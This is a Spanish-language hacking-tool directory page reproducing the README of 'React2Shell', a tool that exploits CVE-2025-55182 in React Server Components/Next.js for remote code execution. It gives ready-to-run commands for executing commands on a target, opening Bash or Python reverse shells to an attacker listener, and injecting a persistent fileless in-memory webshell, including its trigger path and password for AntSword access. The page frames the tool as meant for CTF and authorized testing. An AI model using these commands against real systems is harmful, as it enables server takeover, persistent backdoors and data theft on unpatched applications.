Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-55182-Toolbox | Kitploit
Herramientas/GitHubGitHub/lamaper/cve-2025-55182-toolbox
Mecanismos de PersistenciaExplotaciónExplotación de Aplicaciones WebPost-ExplotaciónCTFPruebas de PenetraciónComando y ControlRed TeamingDesarrollo de Payloads
GitHublamaper/cve-2025-55182-toolbox

CVE-2025-55182-Toolbox

Ver Repositorio
1hace 8 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

React2Shell: Herramienta de explotación integral para CVE-2025-55182

Autor: lamaper / BITs2Sys

Versión: 1.0.1

Licencia: MIT

📝 Introducción a la herramienta

Esta herramienta es una herramienta de pruebas de penetración automatizada diseñada específicamente para CVE-2025-55182 (contaminación de prototipos en React Server Components / Next.js que conduce a RCE). Está diseñada para competiciones CTF y proyectos de seguridad autorizados, integrando múltiples funciones como verificación de vulnerabilidades, detección de conectividad saliente, reverse shells e inyección de memoria webshell (memory马).

🚀 Características principales

  • Ejecución de comandos con un solo comando (--cmd):Utiliza el mecanismo de excepción NEXT_REDIRECT para devolver con precisión los resultados de la ejecución de comandos codificados en Base64.
  • Detección de conectividad saliente (--check-outbound):Prueba automáticamente la capacidad del objetivo para acceder a DNS, HTTP e ICMP, lo que ayuda a decidir la ruta de ataque.
  • Reverse shell interactivo (--shell):Incluye modos de reverse shell Bash y Python3, con soporte de ejecución asíncrona para evitar que las solicitudes HTTP se bloqueen.
  • Memory webshell persistente (--inject-ms):Inyecta una memory webshell secuestrando el mecanismo de distribución de eventos de http.Server en Node.js, sin dejar archivos y con control persistente.
  • Interfaz interactiva de la memory webshell (--ms-cmd):Modo interactivo independiente de la ruta de activación de la vulnerabilidad; después de una inyección exitosa, los comandos pueden ejecutarse directamente a través de la puerta trasera.

🛠️ Instalación y dependencias

Esta herramienta está desarrollada en Python 3 y solo requiere la biblioteca requests.

root@kitploit:~
pip install requests

📖 Guía de uso

0. Detectar si la vulnerabilidad existe

https://github.com/assetnote/react2shell-scanner es una herramienta de detección muy útil

1. Ejecución básica de comandos

Obtenga directamente información del objetivo:

root@kitploit:~
python exploit.py --url http://target.com/ --cmd "id"
python exploit.py --url http://target.com/ --cmd "cat /flag"

2. Detección de conectividad saliente

Antes de intentar una reverse shell, confirme si el objetivo puede conectarse a la red externa:

root@kitploit:~
python exploit.py --url http://target.com/ --check-outbound

3. Reverse shell

Modo Bash:

root@kitploit:~
# Escuche en la máquina atacante: nc -lvnp 4444
python exploit.py --url http://target.com/ --shell bash --ip <TU_IP> --port 4444

Modo Python:

root@kitploit:~
python exploit.py --url http://target.com/ --shell python --ip <TU_IP> --port 4444

4. Uso de la memory webshell (persistente)

Inyección de la memory webshell:

root@kitploit:~
python exploit.py --url http://target.com/ --inject-ms

Ejecutar comandos a través de la memory webshell (después de una inyección exitosa):

root@kitploit:~
python exploit.py --url http://target.com/ --ms-cmd "whoami"

Nota: la ruta de montaje predeterminada de la memory webshell es /?pass, y se activa enviando el parámetro pwd mediante POST.

Conexión con AntSword (China Ant Sword):

Contraseña de conexión: pwd, método de conexión CMDLINUX

⚠️ Descargo de responsabilidad

Esta herramienta está destinada únicamente a investigación de seguridad, competiciones CTF y pruebas de penetración autorizadas dentro de los límites permitidos por la ley. Está estrictamente prohibido utilizarla para ataques ilegales. Todas las consecuencias derivadas del uso de esta herramienta son responsabilidad exclusiva del usuario.


Descargar herramienta